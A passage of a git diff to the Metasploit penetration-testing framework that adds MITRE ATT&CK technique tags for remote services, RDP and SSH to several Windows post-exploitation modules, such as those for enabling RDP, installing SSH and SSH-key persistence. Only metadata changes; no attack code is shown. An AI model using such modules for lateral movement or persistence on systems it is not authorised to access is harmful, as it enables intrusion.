@@ class MetasploitModule < Msf::Post stdapi_sys_process_memory_write ] } - } + }, + 'References' => [ + [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ] + ] ) ) end diff --git a/modules/post/windows/manage/enable_rdp.rb b/modules/post/windows/manage/enable_rdp.rb index 446b93b1bd..3c22f2ff73 100644 --- a/modules/post/windows/manage/enable_rdp.rb +++ b/modules/post/windows/manage/enable_rdp.rb @@ -28,7 +28,10 @@ class MetasploitModule < Msf::Post 'Stability' => [CRASH_SAFE], 'SideEffects' => [CONFIG_CHANGES], 'Reliability' => [] - } + }, + 'References' => [ + [ 'ATT&CK', Mitre::Attack::Technique::T1021_001_REMOTE_DESKTOP_PROTOCOL ] + ] ) ) diff --git a/modules/post/windows/manage/forward_pageant.rb b/modules/post/windows/manage/forward_pageant.rb index e794bd7fa6..a2f3e6cc20 100644 --- a/modules/post/windows/manage/forward_pageant.rb +++ b/modules/post/windows/manage/forward_pageant.rb @@ -43,7 +43,10 @@ class MetasploitModule < Msf::Post extapi_pageant_send_query ] } - } + }, + 'References' => [ + [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ] + ] ) ) register_options([ diff --git a/modules/post/windows/manage/install_ssh.rb b/modules/post/windows/manage/install_ssh.rb index 0bba0056f9..8e5dc256d1 100644 --- a/modules/post/windows/manage/install_ssh.rb +++ b/modules/post/windows/manage/install_ssh.rb @@ -24,7 +24,8 @@ class MetasploitModule < Msf::Post 'SessionTypes' => [ 'meterpreter', 'shell' ], 'References' => [ ['URL', 'https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_overview'], - ['URL', 'https://github.com/PowerShell/openssh-portable'] + ['URL', 'https://github.com/PowerShell/openssh-portable'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] ], 'Notes' => { 'Stability' => [CRASH_SAFE], diff --git a/modules/post/windows/manage/pptp_tunnel.rb b/modules/post/windows/manage/pptp_tunnel.rb index d7b81464d9..a4d96e358b 100644 --- a/modules/post/windows/manage/pptp_tunnel.rb +++ b/modules/post/windows/manage/pptp_tunnel.rb @@ -22,7 +22,8 @@ class MetasploitModule < Msf::Post 'License' => MSF_LICENSE, 'Author' => 'Borja Merino ', 'References' => [ - [ 'URL', 'https://www.youtube.com/watch?v=vdppEZjMPCM&hd=1' ] + [ 'URL', 'https://www.youtube.com/watch?v=vdppEZjMPCM&hd=1' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ] ], 'Platform' => 'win', 'SessionTypes' => [ 'meterpreter' ], diff --git a/modules/post/windows/manage/sshkey_persistence.rb b/modules/post/windows/manage/sshkey_persistence.rb index c634cf5bd3..e14975d2cf 100644 --- a/modules/post/windows/manage/sshkey_persistence.rb +++ b/modules/post/windows/manage/sshkey_persistence.rb @@ -38,7 +38,10 @@ class MetasploitModule < Msf::Post 'Stability' => [CRASH_SAFE], 'SideEffects' => [ARTIFACTS_ON_DISK], 'Reliability' => [] - } + }, + 'References' => [ + [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ] + ] ) )